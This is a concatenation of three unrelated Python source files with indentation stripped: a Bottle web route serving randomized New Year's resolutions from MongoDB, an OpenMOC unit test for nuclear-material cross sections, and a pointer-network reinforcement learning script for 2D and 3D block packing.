@route('/<slug>')
def page(slug):
try:
decoded_slug = base64.standard_b64decode(slug).decode()
ids_to_search = []
resolutions = {}
resolutions_from_db = db['documents'].find({"_id" :{
"$in" : decoded_slug.split('_')
}});
except Exception as ex:
return template('views/404.tpl')
for resolution in resolutions_from_db:
resolutions[resolution["Categoria"]] = resolution["Testo"]
currentUrl = format(request.url)
domain = get_domain(currentUrl)
shareTitle = "Buonipropositi 2020"
return template(
'views/buonipropositi.tpl',
title = 'Buoni Propositi Randomize',
resolutions = resolutions,
currentUrl = currentUrl,
shareTitle = shareTitle,
domain = domain,
)
@error(404)
def error404(error):
return template('views/404.tpl')
if ENVIRONMENT == "DEVELOPMENT":
    @route(r'/images/<filename:re:.*\.png>')
def send_image(filename):
return static_file(filename, root='images', mimetype='image/png')
@route('/static/<filename:path>')
def send_static(filename):
return static_file(filename, root='assets')
@route('/static/favicon.ico')
def favicon():
print("aaa")
return send_static("/favicon.ico")
print ("Running in DEBUG mode with dev server....")
run(
host='0.0.0.0',
port=8080,
reloader=True,
debug=True
)
else:
print ("Running with gunicorn server....")
run(
host='0.0.0.0',
port=8080,
server='gunicorn',
workers=os.environ.get('WORKERS', 8),
reloader=False,
debug=False
)
|
import unittest
import numpy
import os
import sys
sys.path.insert(0, os.pardir)
sys.path.insert(0, os.path.join(os.pardir, 'openmoc'))
import openmoc
class TestMaterials(unittest.TestCase):
def setUp(self):
sigma_f = numpy.array([0.000625, 0.135416667])
nu_sigma_f = numpy.array([0.0015, 0.325])
sigma_s = numpy.array([[0.1, 0.117], [0., 1.42]])
chi = numpy.array([1.0, 0.0])
sigma_t = numpy.array([0.2208, 1.604])
self.test_material = openmoc.Material()
self.test_material.setName('2-group infinite medium')
self.test_material.setNumEnergyGroups(2)
self.test_material.setSigmaF(sigma_f)
self.test_material.setNuSigmaF(nu_sigma_f)
self.test_material.setSigmaS(sigma_s.flat)
self.test_material.setChi(chi)
self.test_material.setSigmaT(sigma_t)
def test_ids(self):
openmoc.reset_material_id()
material_2 = openmoc.Cell()
self.assertEqual(material_2.getId(), 1000000)
openmoc.maximize_material_id(10000000)
material_3 = openmoc.Cell()
self.assertEqual(material_3.getId(), 1000001)
self.test_material.printString()
def test_instances(self):
self.assertEqual(self.test_material.getNumInstances(), 0)
self.test_material.setNumInstances(99)
self.assertEqual(self.test_material.getNumInstances(), 99)
self.test_material.incrementNumInstances()
self.assertEqual(self.test_material.getNumInstances(), 100)
def test_fission_matrix(self):
material = openmoc.Material()
with self.assertRaises(Exception): material.buildFissionMatrix()
self.test_material.buildFissionMatrix()
self.assertAlmostEqual(self.test_material.getFissionMatrixByGroup(1,1), .0015)
self.assertAlmostEqual(self.test_material.getFissionMatrixByGroup(2,1), .325)
def test_volume(self):
self.test_material.setVolume(5)
self.assertEqual(self.test_material.getVolume(), 5)
self.test_material.incrementVolume(-2)
self.assertEqual(self.test_material.getVolume(), 3)
self.test_material.incrementVolume(2)
self.assertEqual(self.test_material.getVolume(), 5)
def test_get_cross_section_by_group(self):
self.assertAlmostEqual(self.test_material.getSigmaTByGroup(1), 0.2208)
self.assertAlmostEqual(self.test_material.getSigmaAByGroup(1), 0.0038)
self.assertAlmostEqual(self.test_material.getSigmaFByGroup(1), 0.000625)
self.assertAlmostEqual(self.test_material.getSigmaSByGroup(1, 1), 0.1)
self.assertAlmostEqual(self.test_material.getChiByGroup(1), 1.)
self.assertAlmostEqual(self.test_material.getNuSigmaFByGroup(1), 0.0015)
def test_get_cross_section(self):
material = openmoc.Material()
with self.assertRaises(Exception): material.getSigmaS()
with self.assertRaises(Exception): material.getSigmaA()
with self.assertRaises(Exception): material.getSigmaT()
with self.assertRaises(Exception): material.getSigmaF()
with self.assertRaises(Exception): material.getNuSigmaF()
def test_cross_section_alignment(self):
material = openmoc.Material()
with self.assertRaises(Exception): material.alignData()
self.test_material.alignData()
self.assertEqual(self.test_material.isDataAligned(), True)
self.assertEqual(self.test_material.getNumVectorGroups(), 1)
self.assertAlmostEqual(self.test_material.getSigmaTByGroup(1), 0.2208)
#FIXME SigmaA is not copied during alignment process
self.assertAlmostEqual(self.test_material.getSigmaAByGroup(1), 0.1208)
self.assertAlmostEqual(self.test_material.getSigmaFByGroup(1), 0.000625)
self.assertAlmostEqual(self.test_material.getSigmaSByGroup(1, 1), 0.1)
self.assertAlmostEqual(self.test_material.getChiByGroup(1), 1.)
self.assertAlmostEqual(self.test_material.getNuSigmaFByGroup(1), 0.0015)
if __name__ == '__main__':
unittest.main()
|
import os
import time
import argparse
import datetime
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data import DataLoader
from torch.utils.data import Dataset
import math
import itertools
from tqdm import tqdm
import tools
import generate
# from model import DRL
def get_dataset( blocks_num, train_size, valid_size, obj_dim, initial_container_width, initial_container_height, arm_size, size_range, seed=None):
blocks_num = int(blocks_num)
if seed is None:
seed = np.random.randint(123456789)
np.random.seed(seed)
if obj_dim == 2:
initial_container_size = [initial_container_width, initial_container_height]
train_dir = './data/rand_2d/pack-train-' + str(blocks_num) + '-' + str(train_size) + '-' + str(initial_container_width) + '-' + str(size_range[0]) + '-' + str(size_range[1]) + '/'
valid_dir = './data/rand_2d/pack-valid-' + str(blocks_num) + '-' + str(valid_size) + '-' + str(initial_container_width) + '-' + str(size_range[0]) + '-' + str(size_range[1]) + '/'
elif obj_dim == 3:
initial_container_size = [initial_container_width, initial_container_width, initial_container_height]
train_dir = './data/rand_3d/pack-train-' + str(blocks_num) + '-' + str(train_size) + '-' + str(initial_container_width) + '-' + str(size_range[0]) + '-' + str(size_range[1]) + '/'
valid_dir = './data/rand_3d/pack-valid-' + str(blocks_num) + '-' + str(valid_size) + '-' + str(initial_container_width) + '-' + str(size_range[0]) + '-' + str(size_range[1]) + '/'
def arr2str(arr):
ret = ''
for i in range(len(arr)-1):
ret += str(arr[i]) + ' '
ret += str(arr[-1]) + '\n'
return ret
if os.path.exists(train_dir + 'blocks.txt') and os.path.exists(valid_dir + 'blocks.txt'):
return train_dir, valid_dir
if not os.path.exists(train_dir):
os.mkdir(train_dir)
if not os.path.exists(valid_dir):
os.mkdir(valid_dir)
def generate_data(data_dir, data_size):
blocks_f = open(data_dir + 'blocks.txt', 'w')
pos_f = open(data_dir + 'pos.txt', 'w')
container_f = open(data_dir + 'container.txt', 'w')
deps_move_f = open(data_dir + 'dep_move.txt', 'w')
rotate_deps_small_f = open(data_dir + 'dep_small.txt', 'w')
rotate_deps_large_f = open(data_dir + 'dep_large.txt', 'w')
for _ in tqdm(range(data_size)):
rotate_blocks, positions, deps_move, rotate_deps_small, rotate_deps_large = generate.generate_blocks(blocks_num, initial_container_size, arm_size, size_range)
for blocks_index, blocks in enumerate(rotate_blocks):
blocks_f.writelines(arr2str( blocks ) )
rotate_deps_small_f.writelines(arr2str( rotate_deps_small[blocks_index] ))
rotate_deps_large_f.writelines(arr2str( rotate_deps_large[blocks_index] ))
pos_f.writelines(arr2str( positions ) )
deps_move_f.writelines( arr2str( deps_move ) )
            container_f.writelines( arr2str( np.random.randint(0, 2, blocks_num) ) )
blocks_f.close()
rotate_deps_small_f.close()
rotate_deps_large_f.close()
pos_f.close()
deps_move_f.close()
container_f.close()
if not os.path.exists(train_dir + 'blocks.txt'):
generate_data(train_dir, train_size)
if not os.path.exists(valid_dir + 'blocks.txt'):
generate_data(valid_dir, valid_size)
return train_dir, valid_dir
class Encoder(nn.Module):
"""Encodes the static & dynamic states using 1d Convolution."""
def __init__(self, input_size, hidden_size):
super(Encoder, self).__init__()
self.conv = nn.Conv1d(input_size, int(hidden_size), kernel_size=1)
def forward(self, input):
output = self.conv(input)
return output # (batch, hidden_size, seq_len)
class HeightmapEncoder(nn.Module):
"""Encodes the static & dynamic states using 1d Convolution."""
def __init__(self, input_size, hidden_size, map_width):
super(HeightmapEncoder, self).__init__()
self.conv1 = nn.Conv2d(input_size, int(hidden_size/4), stride=2, kernel_size=1)
self.conv2 = nn.Conv2d(int(hidden_size/4), int(hidden_size/2), stride=2, kernel_size=1)
self.conv3 = nn.Conv2d(int(hidden_size/2), int(hidden_size), kernel_size= math.ceil(map_width/4))
def forward(self, input):
output = F.leaky_relu(self.conv1(input))
output = F.leaky_relu(self.conv2(output))
output = self.conv3(output).squeeze(-1)
return output # (batch, hidden_size, seq_len)
class Attention(nn.Module):
"""Calculates attention over the input nodes given the current state."""
def __init__(self, encoder_hidden_size, decoder_hidden_size, decoder_input_type, input_type):
super(Attention, self).__init__()
# W processes features from static decoder elements
self.v = nn.Parameter(torch.zeros((1, 1, decoder_hidden_size), requires_grad=True))
self.W = nn.Parameter(torch.zeros((1, decoder_hidden_size, 2 * encoder_hidden_size + decoder_hidden_size), requires_grad=True))
self.decoder_input_type = decoder_input_type
self.input_type = input_type
def forward(self, static_hidden, dynamic_hidden, decoder_hidden):
encoder_hidden = torch.cat( (static_hidden, dynamic_hidden), 1 )
batch_size, hidden_size = decoder_hidden.size()
decoder_hidden = decoder_hidden.unsqueeze(2).repeat(1, 1, static_hidden.shape[-1])
# expand_as(static_hidden)
hidden = torch.cat((encoder_hidden, decoder_hidden), 1)
# Broadcast some dimensions so we can do batch-matrix-multiply
v = self.v.expand(batch_size, 1, hidden_size)
W = self.W.expand(batch_size, hidden_size, -1)
attns = torch.bmm(v, torch.tanh(torch.bmm(W, hidden)))
attns = F.softmax(attns, dim=2) # (batch, seq_len)
return attns
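# Shape sketch for Attention.forward (inferred from the code above, added as a
# descriptive note): static_hidden and dynamic_hidden are
# (batch, encoder_hidden_size, seq_len), decoder_hidden is
# (batch, decoder_hidden_size); the returned attns is (batch, 1, seq_len) after
# the softmax over the sequence dimension.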
class Pointer(nn.Module):
"""Calculates the next state given the previous state and input embeddings."""
def __init__(self, encoder_hidden_size, decoder_hidden_size, decoder_input_type, input_type, num_layers=1, dropout=0.2):
super(Pointer, self).__init__()
self.encoder_hidden_size = encoder_hidden_size
self.decoder_hidden_size = decoder_hidden_size
self.num_layers = num_layers
self.decoder_input_type = decoder_input_type
self.input_type = input_type
# Used to calculate probability of selecting next state
self.v = nn.Parameter(torch.zeros((1, 1, decoder_hidden_size), requires_grad=True))
self.W = nn.Parameter(torch.zeros((1, decoder_hidden_size, 4 * encoder_hidden_size), requires_grad=True))
# Used to compute a representation of the current decoder output
self.gru = nn.GRU( decoder_hidden_size, decoder_hidden_size, num_layers,
batch_first=True,
dropout=dropout if num_layers > 1 else 0)
self.encoder_attn = Attention( encoder_hidden_size, decoder_hidden_size, decoder_input_type, input_type)
self.drop_rnn = nn.Dropout(p=dropout)
self.drop_hh = nn.Dropout(p=dropout)
def forward(self, static_hidden, dynamic_hidden, decoder_hidden, last_hh):
rnn_out, last_hh = self.gru(decoder_hidden.transpose(2, 1), last_hh)
rnn_out = rnn_out.squeeze(1)
# Always apply dropout on the RNN output
rnn_out = self.drop_rnn(rnn_out)
if self.num_layers == 1:
# If > 1 layer dropout is already applied
last_hh = self.drop_hh(last_hh)
# Given a summary of the output, find an input context
enc_attn = self.encoder_attn( static_hidden, dynamic_hidden, rnn_out)
encoder_hidden = torch.cat( (static_hidden, dynamic_hidden), 1)
context = enc_attn.bmm( encoder_hidden.permute(0, 2, 1)) # (B, 1, num_feats)
# Calculate the next output using Batch-matrix-multiply ops
context = context.transpose(1, 2).expand_as( encoder_hidden )
energy = torch.cat(( encoder_hidden, context), dim=1) # (B, num_feats, seq_len)
v = self.v.expand(static_hidden.size(0), -1, -1)
W = self.W.expand(static_hidden.size(0), -1, -1)
probs = torch.bmm(v, torch.tanh(torch.bmm(W, energy))).squeeze(1)
return probs, last_hh
class DRL(nn.Module):
def __init__(self, static_size, dynamic_size, encoder_hidden_size, decoder_hidden_size,
use_cuda, input_type, allow_rot, container_width, container_height, block_dim,
reward_type, decoder_input_type, heightmap_type, packing_strategy,
containers,
update_fn, mask_fn, num_layers=1, dropout=0., unit=1):
super(DRL, self).__init__()
if dynamic_size < 1:
raise ValueError(':param dynamic_size: must be > 0, even if the '
'problem has no dynamic elements')
print(' static size: %d, dynamic size: %d' % (static_size, dynamic_size))
print(' encoder hidden size: %d' % (encoder_hidden_size))
print(' decoder hidden size: %d' % (decoder_hidden_size))
self.update_fn = update_fn
self.mask_fn = mask_fn
# Define the encoder & decoder models
self.static_encoder = Encoder(static_size, encoder_hidden_size)
self.dynamic_encoder = Encoder(dynamic_size, encoder_hidden_size)
heightmap_num = 1
if heightmap_type == 'diff':
if block_dim == 2:
heightmap_width = container_width * unit - 1
elif block_dim == 3:
heightmap_num = 2
heightmap_width = container_width * unit
heightmap_length = container_width * unit
else:
heightmap_width = container_width * unit
heightmap_length = container_width * unit
if input_type == 'mul' or input_type == 'mul-with':
if block_dim == 2:
heightmap_width = heightmap_width * 2
else:
heightmap_num = heightmap_num * 2
if decoder_input_type == 'shape_only':
self.decoder = Encoder(static_size, decoder_hidden_size)
elif decoder_input_type == 'heightmap_only':
if block_dim == 2:
self.dynamic_decoder = Encoder(heightmap_width, int(decoder_hidden_size))
elif block_dim == 3:
self.dynamic_decoder = HeightmapEncoder(heightmap_num, int(decoder_hidden_size), (heightmap_width, heightmap_length))
elif decoder_input_type == 'shape_heightmap':
self.static_decoder = Encoder(static_size, int(decoder_hidden_size/2))
if block_dim == 2:
self.dynamic_decoder = Encoder(heightmap_width, int(decoder_hidden_size/2))
elif block_dim == 3:
self.dynamic_decoder = HeightmapEncoder(heightmap_num, int(decoder_hidden_size/2), (heightmap_width, heightmap_length))
# if use_heightmap:
# if only_heightmap:
# if block_dim == 2:
# self.dynamic_decoder = Encoder(container_width, int(decoder_hidden_size))
# elif block_dim == 3:
# self.dynamic_decoder = HeightmapEncoder(1, int(decoder_hidden_size), container_width)
# else:
# self.static_decoder = Encoder(static_size, int(decoder_hidden_size/2))
# if block_dim == 2:
# self.dynamic_decoder = Encoder(container_width, int(decoder_hidden_size/2))
# elif block_dim == 3:
# self.dynamic_decoder = HeightmapEncoder(1, int(decoder_hidden_size/2), container_width)
# else:
# self.decoder = Encoder(static_size, decoder_hidden_size)
self.pointer = Pointer(encoder_hidden_size, decoder_hidden_size, decoder_input_type, input_type, num_layers, dropout)
for p in self.parameters():
if len(p.shape) > 1:
nn.init.xavier_uniform_(p)
self.encoder_hidden_size = encoder_hidden_size
self.decoder_hidden_size = decoder_hidden_size
self.use_cuda = use_cuda
self.input_type = input_type
self.allow_rot = allow_rot
self.block_dim = block_dim
self.static_size = static_size
self.dynamic_size = dynamic_size
self.reward_type = reward_type
self.container_width = container_width
self.container_height = container_height
self.decoder_input_type = decoder_input_type
self.heightmap_type = heightmap_type
self.packing_strategy = packing_strategy
self.containers = containers
def forward(self, static, dynamic, decoder_input, last_hh=None, one_step=False):
batch_size, _, sequence_size = static.size()
if self.allow_rot == False:
rotate_types = 1
else:
if self.block_dim == 2:
rotate_types = 2
elif self.block_dim == 3:
rotate_types = 6
blocks_num = int(dynamic.shape[-1] / rotate_types)
# if self.block_dim == 3:
# container_size = [self.container_width, self.container_width, self.container_height]
# else:
# container_size = [self.container_width, self.container_height]
# if self.input_type == 'mul' or self.input_type == 'mul-with':
# if self.block_dim == 3:
# container_size_a = [self.container_width, self.container_width, self.container_height]
# container_size_b = container_size_a
# else:
# container_size_a = [self.container_width, self.container_height]
# container_size_b = container_size_a
# if self.input_type == 'mul' or self.input_type == 'mul-with':
# containers_a = [tools.Container(container_size_a, blocks_num, self.reward_type, self.heightmap_type, packing_strategy=self.packing_strategy) for _ in range(batch_size)]
# containers_b = [tools.Container(container_size_b, blocks_num, self.reward_type, self.heightmap_type, packing_strategy=self.packing_strategy) for _ in range(batch_size)]
# else:
# containers = [tools.Container(container_size, blocks_num, self.reward_type, self.heightmap_type, packing_strategy=self.packing_strategy) for _ in range(batch_size)]
mask = torch.ones(batch_size, sequence_size)
if self.use_cuda:
mask = mask.cuda()
current_mask = mask.clone()
move_mask = dynamic[:, :blocks_num, :].sum(1)
rotate_small_mask = dynamic[:, blocks_num:blocks_num*2, :].sum(1)
rotate_large_mask = dynamic[:, blocks_num*2:blocks_num*3, :].sum(1)
rotate_mask = rotate_small_mask * rotate_large_mask
dynamic_mask = rotate_mask + move_mask
current_mask[ dynamic_mask.ne(0) ] = 0.
max_steps = sequence_size if self.mask_fn is None else 1000
if self.input_type == 'mul':
static_hidden = self.static_encoder(static[:,1:-1,:])
elif self.input_type == 'rot-old':
static_hidden = self.static_encoder(static)
else:
static_hidden = self.static_encoder(static[:,1:,:])
dynamic_hidden = self.dynamic_encoder(dynamic)
# if self.use_heightmap:
if 'heightmap' in self.decoder_input_type:
decoder_static, decoder_dynamic = decoder_input
if one_step == True:
max_steps = 1
for _ in range(max_steps):
if not mask.byte().any():
break
if self.decoder_input_type == 'shape_only':
decoder_hidden = self.decoder(decoder_input)
elif self.decoder_input_type == 'heightmap_only':
decoder_hidden = self.dynamic_decoder(decoder_dynamic)
elif self.decoder_input_type == 'shape_heightmap':
decoder_static_hidden = self.static_decoder(decoder_static)
decoder_dynamic_hidden = self.dynamic_decoder(decoder_dynamic)
decoder_hidden = torch.cat( (decoder_static_hidden, decoder_dynamic_hidden), 1 )
# if self.use_heightmap:
# if self.only_heightmap:
# decoder_hidden = self.dynamic_decoder(decoder_dynamic)
# else:
# decoder_static_hidden = self.static_decoder(decoder_static)
# decoder_dynamic_hidden = self.dynamic_decoder(decoder_dynamic)
# decoder_hidden = torch.cat( (decoder_static_hidden, decoder_dynamic_hidden), 1 )
# else:
# decoder_hidden = self.decoder(decoder_input)
probs, last_hh = self.pointer(static_hidden,
dynamic_hidden,
decoder_hidden, last_hh)
probs = F.softmax(probs + current_mask.log(), dim=1)
if self.training:
m = torch.distributions.Categorical(probs)
ptr = m.sample()
while not torch.gather(mask, 1, ptr.data.unsqueeze(1)).byte().all():
ptr = m.sample()
logp = m.log_prob(ptr)
else:
prob, ptr = torch.max(probs, 1) # Greedy
logp = prob.log()
# After visiting a node update the dynamic representation
if self.update_fn is not None:
dynamic = self.update_fn(dynamic, static, ptr.data, self.input_type, self.allow_rot)
dynamic_hidden = self.dynamic_encoder(dynamic)
# And update the mask so we don't re-visit if we don't need to
if self.mask_fn is not None:
current_mask, mask = self.mask_fn(mask, dynamic, static, ptr.data, self.input_type, self.allow_rot)
current_mask = current_mask.detach()
mask = mask.detach()
if self.input_type == 'mul':
static_part = static[:,1:-1,:]
elif self.input_type == 'rot-old':
static_part = static
else:
static_part = static[:,1:,:]
# if self.use_heightmap:
if 'heightmap' in self.decoder_input_type:
decoder_static = torch.gather( static_part, 2,
ptr.view(-1, 1, 1)
.expand(-1, self.static_size, 1)).detach()
is_rotate = (ptr < blocks_num).cpu().numpy().astype('bool')
blocks = decoder_static.transpose(2,1).squeeze(1).cpu().numpy()
# now get the selected blocks and update heightmap
heightmaps = []
for batch_index in range(batch_size):
heightmaps.append(self.containers[batch_index].add_new_block(blocks[batch_index], is_rotate[batch_index] ))
# heightmaps.append(containers[batch_index].add_new_block(blocks[batch_index], is_rotate[batch_index] ))
if self.block_dim == 2:
if self.use_cuda:
decoder_dynamic = torch.FloatTensor(heightmaps).cuda().unsqueeze(2)
else:
decoder_dynamic = torch.FloatTensor(heightmaps).unsqueeze(2)
elif self.block_dim == 3:
if self.use_cuda:
decoder_dynamic = torch.FloatTensor(heightmaps).cuda()
else:
decoder_dynamic = torch.FloatTensor(heightmaps)
if self.heightmap_type != 'diff':
decoder_dynamic = decoder_dynamic.unsqueeze(1)
else:
decoder_input = torch.gather(static_part, 2,
ptr.view(-1, 1, 1)
.expand(-1, self.static_size, 1)).detach()
# check rotate or not
is_rotate = (ptr < blocks_num).cpu().numpy().astype('bool')
# now get the selected blocks and update containers
blocks = decoder_input.transpose(2,1).squeeze(1).cpu().numpy()
for batch_index in range(batch_size):
self.containers[batch_index].add_new_block(blocks[batch_index], is_rotate[batch_index] )
# containers[batch_index].add_new_block(blocks[batch_index], is_rotate[batch_index] )
# if self.use_heightmap:
if 'heightmap' in self.decoder_input_type:
return ptr, [decoder_static, decoder_dynamic], last_hh
return ptr, decoder_input, last_hh
class RollingDataset(object):
def __init__(self, data_file, total_blocks_num, net_blocks_num, num_samples, block_dim, seed, input_type, heightmap_type, allow_rot, \
container_width, initial_container_width, initial_container_height, mix_data_file=None, unit=1):
if seed is None:
seed = np.random.randint(123456)
np.random.seed(seed)
torch.manual_seed(seed)
deps_move = np.loadtxt(data_file + 'dep_move.txt').astype('int')
rotate_deps_small = np.loadtxt(data_file + 'dep_small.txt').astype('int')
rotate_deps_large = np.loadtxt(data_file + 'dep_large.txt').astype('int')
blocks = np.loadtxt(data_file + 'blocks.txt').astype('int')
positions = np.loadtxt(data_file + 'pos.txt').astype('int')
container_index = np.loadtxt(data_file + 'container.txt').astype('int')
rotate_types = np.math.factorial(block_dim)
data_size = int( len(blocks) / rotate_types )
blocks = blocks.reshape( data_size, -1, block_dim, total_blocks_num)
blocks = blocks.transpose(0, 1, 3, 2)
blocks = blocks.reshape( data_size, -1, block_dim )
deps_move = deps_move.reshape( len(deps_move), total_blocks_num, -1 )
deps_move = deps_move.transpose(0,2,1)
positions = positions.reshape( len(positions), -1, total_blocks_num )
positions = positions.transpose(0,2,1)
if block_dim == 2:
initial_container_size = [ initial_container_width, initial_container_height ]
elif block_dim == 3:
initial_container_size = [ initial_container_width, initial_container_width, initial_container_height ]
initial_containers = []
for batch_index in range(num_samples):
initial_container = generate.InitialContainer(blocks[batch_index], positions[batch_index], total_blocks_num, initial_container_size, True, net_blocks_num, input_type)
initial_containers.append(initial_container)
self.initial_containers = initial_containers
static_dim = block_dim
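        # Heightmap layout depends on heightmap_type and input_type: 'diff' drops one column in 2D
        # and uses two channels in 3D; the 'mul' variants double the 2D width (or the 3D channel
        # count), and 'mul-with' additionally adds one static feature.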
heightmap_num = 1
if heightmap_type == 'diff':
if block_dim == 2:
heightmap_width = container_width * unit - 1
elif block_dim == 3:
heightmap_num = 2
heightmap_width = container_width * unit
heightmap_length = container_width * unit
else:
heightmap_width = container_width * unit
heightmap_length = container_width * unit
if input_type == 'mul' or input_type == 'mul-with':
if block_dim == 2:
heightmap_width = heightmap_width * 2
else:
heightmap_num = heightmap_num * 2
if input_type == 'mul-with':
static_dim = static_dim + 1
if block_dim == 2:
self.decoder_static = torch.zeros(1, static_dim, 1, requires_grad=True)
self.decoder_dynamic = torch.zeros(1, heightmap_width, 1, requires_grad=True)
elif block_dim == 3:
self.decoder_static = torch.zeros(1, static_dim, 1, requires_grad=True)
self.decoder_dynamic = torch.zeros(1, heightmap_num, heightmap_width, heightmap_width, requires_grad=True)
self.num_samples = num_samples
def str2bool(v):
return v.lower() in ('true', '1')
def validate(actor, task, num_nodes, valid_data, batch_size,
reward_type, input_type,
allow_rot, obj_dim,
container_width, initial_container_width,
total_blocks_num, network_blocks_num,
use_cuda, decoder_input_type,
**kwargs):
"""Used to monitor progress on a validation set & optionally plot solution."""
actor.eval()
date = datetime.datetime.now()
now = '%s' % date.date()
now += '-%s' % date.hour
now += '-%s' % date.minute
now = str(now)
save_dir = os.path.join(task, '%d' % num_nodes,
str(obj_dim) + 'd-' + input_type + '-' + reward_type + '-width-' + str(container_width) + '-note-' + kwargs['note'] + '-' + now)
if not os.path.exists(save_dir):
os.makedirs(save_dir)
save_path = save_dir + '/render'
if not os.path.exists(save_path):
os.makedirs(save_path)
save_path = save_dir + '/render/0'
if not os.path.exists(save_path):
os.makedirs(save_path)
my_valid_size = []
my_box_size = []
my_empty_size = []
my_stable_num = []
my_packing_height = []
my_time = []
for i in tqdm(range( valid_data.num_samples )):
initial_container = valid_data.initial_containers[i]
start = time.time()
with torch.no_grad():
one_step = True
last_hh = None
decoder_static = valid_data.decoder_static
decoder_dynamic = valid_data.decoder_dynamic
# valid_size = []
# box_size = []
# empty_size = []
# stable_num = []
# packing_height = []
while one_step == True:
static, dynamic = initial_container.convert_to_input()
static = torch.FloatTensor(static).unsqueeze(0)
dynamic = torch.FloatTensor(dynamic).unsqueeze(0)
if initial_container.is_last_graph():
one_step = False
if use_cuda:
static = static.cuda()
dynamic = dynamic.cuda()
decoder_static = decoder_static.cuda()
decoder_dynamic = decoder_dynamic.cuda()
# if use_heightmap:
if 'heightmap' in decoder_input_type:
ptr, [decoder_static, decoder_dynamic], last_hh = actor(static, dynamic, [decoder_static, decoder_dynamic], last_hh, one_step)
else:
ptr, decoder_static, last_hh = actor(static, dynamic, decoder_static, last_hh, one_step)
                # check actor.containers[0]: if ptr can be placed and the block is stable but the
                # container would exceed its height limit, we should place the block in a new container
# if container is full:
# container = actor.containers[0]
# valid_size.append(container.valid_size)
# height = np.max(container.heightmap)
# if container.block_dim == 2:
# box_size = container.container_size[0] * height
# elif container.block_dim == 3:
# box_size = container.container_size[0] * container.container_size[1] * height
# box_size.append(box_size)
# empty_size.append(container.empty_size)
# stable_num.append( np.sum(container.stable) * ( network_blocks_num / total_blocks_num) )
# packing_height.append(container.bounding_box[-1])
# container.draw_container()
# container.clear_container()
# continue
# get real block id
ptr = ptr.cpu().numpy().astype('int')[0]
while ptr >= network_blocks_num:
ptr -= network_blocks_num
initial_container.remove_block( initial_container.sub_graph_nodes[ptr] )
my_time.append(time.time() - start)
container = actor.containers[0]
my_valid_size.append(container.valid_size)
height = np.max(container.heightmap)
if container.block_dim == 2:
box_size = container.container_size[0] * height
elif container.block_dim == 3:
box_size = container.container_size[0] * container.container_size[1] * height
my_box_size.append(box_size)
my_empty_size.append(container.empty_size)
my_stable_num.append( np.sum(container.stable) * ( network_blocks_num / total_blocks_num) )
my_packing_height.append(container.bounding_box[-1])
if i < 6:
container.draw_container(save_path + '/%d' % i)
actor.containers[0].clear_container()
np.savetxt( save_path + '/batch-valid_size.txt', my_valid_size)
np.savetxt( save_path + '/batch-box_size.txt', my_box_size)
np.savetxt( save_path + '/batch-empty_size.txt', my_empty_size)
np.savetxt( save_path + '/batch-stable_num.txt', my_stable_num)
np.savetxt( save_path + '/batch-packing_height.txt', my_packing_height)
np.savetxt( save_path + '/batch-time.txt', my_time)
def train_pack(args):
import pack
if args.input_type == 'simple':
STATIC_SIZE = args.obj_dim
DYNAMIC_SIZE = args.num_nodes
elif args.input_type == 'rot':
STATIC_SIZE = args.obj_dim
DYNAMIC_SIZE = args.num_nodes
elif args.input_type == 'bot' or args.input_type == 'bot-rot':
STATIC_SIZE = args.obj_dim
DYNAMIC_SIZE = args.num_nodes * 3
elif args.input_type == 'mul':
STATIC_SIZE = args.obj_dim
DYNAMIC_SIZE = args.num_nodes
elif args.input_type == 'mul-with':
STATIC_SIZE = args.obj_dim + 1
DYNAMIC_SIZE = args.num_nodes
elif args.input_type == 'rot-old':
STATIC_SIZE = args.obj_dim + 1
DYNAMIC_SIZE = args.num_nodes + 1
else:
        print('Unknown input type: %s' % args.input_type)
print('Loading data...')
use_cuda = args.use_cuda
size_range = [ args.min_size, args.max_size ]
if args.obj_dim == 2:
container_size = [args.container_width, args.container_height]
initial_container_size = [args.initial_container_width, args.initial_container_height]
elif args.obj_dim == 3:
container_size = [args.container_width, args.container_width, args.container_height]
initial_container_size = [args.initial_container_width, args.initial_container_width, args.initial_container_height]
containers = [tools.Container(container_size, args.total_blocks_num, args.reward_type, args.heightmap_type, \
initial_container_size, packing_strategy=args.packing_strategy)]
train_file, valid_file = get_dataset(
args.total_blocks_num,
args.train_size,
args.valid_size,
args.obj_dim,
args.initial_container_width,
args.initial_container_height,
args.arm_size,
size_range,
seed=args.seed,
)
# if args.just_generate == True:
# return
print(valid_file)
valid_data = RollingDataset(
valid_file,
args.total_blocks_num,
args.num_nodes,
args.valid_size,
args.obj_dim,
args.seed + 1,
args.input_type,
args.heightmap_type,
args.allow_rot,
args.container_width,
args.initial_container_width,
args.initial_container_height,
unit=args.unit
)
actor = DRL(STATIC_SIZE,
DYNAMIC_SIZE,
args.encoder_hidden_size,
args.decoder_hidden_size,
args.use_cuda,
args.input_type,
args.allow_rot,
args.container_width,
args.container_height,
args.obj_dim,
args.reward_type,
args.decoder_input_type,
args.heightmap_type,
args.packing_strategy,
containers,
pack.update_dynamic,
pack.update_mask,
args.num_layers,
args.dropout,
args.unit
)
if use_cuda:
actor = actor.cuda()
if args.checkpoint:
path = os.path.join(args.checkpoint, 'actor.pt')
actor.load_state_dict(torch.load(path))
        print('Loading pre-trained model:', path)
kwargs = vars(args)
kwargs['valid_data'] = valid_data
kwargs['network_blocks_num'] = args.num_nodes
validate(actor, **kwargs)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Combinatorial Optimization')
# Task settings
parser.add_argument('--task', default='pack')
parser.add_argument('--note', default='rolling-debug-and-test', type=str)
parser.add_argument('--just_test', default=True, type=str2bool)
parser.add_argument('--just_generate', default=False, type=str2bool)
parser.add_argument('--use_cuda', default=True, type=str2bool)
parser.add_argument('--cuda', default='0', type=str)
parser.add_argument('--cpu_threads', default=0, type=int)
parser.add_argument('--checkpoint', default=None)
parser.add_argument('--seed', default=12345, type=int)
# Training/testing settings
parser.add_argument('--train_size',default=10, type=int)
parser.add_argument('--valid_size', default=10, type=int)
parser.add_argument('--epoch_num', default=1, type=int)
parser.add_argument('--batch_size', default=128, type=int)
# Data settings
parser.add_argument('--obj_dim', default=2, type=int)
parser.add_argument('--gt_data', default=False, type=str2bool)
parser.add_argument('--mix_data', default=False, type=str2bool)
parser.add_argument('--nodes', dest='num_nodes', default=10, type=int)
# sizes of blocks and containers
parser.add_argument('--unit', default=1, type=int)
parser.add_argument('--arm_size', default=1, type=int)
parser.add_argument('--min_size', default=1, type=int)
parser.add_argument('--max_size', default=5, type=int)
parser.add_argument('--container_width', default=5, type=int)
parser.add_argument('--container_height', default=250, type=int)
parser.add_argument('--initial_container_width', default=7, type=int)
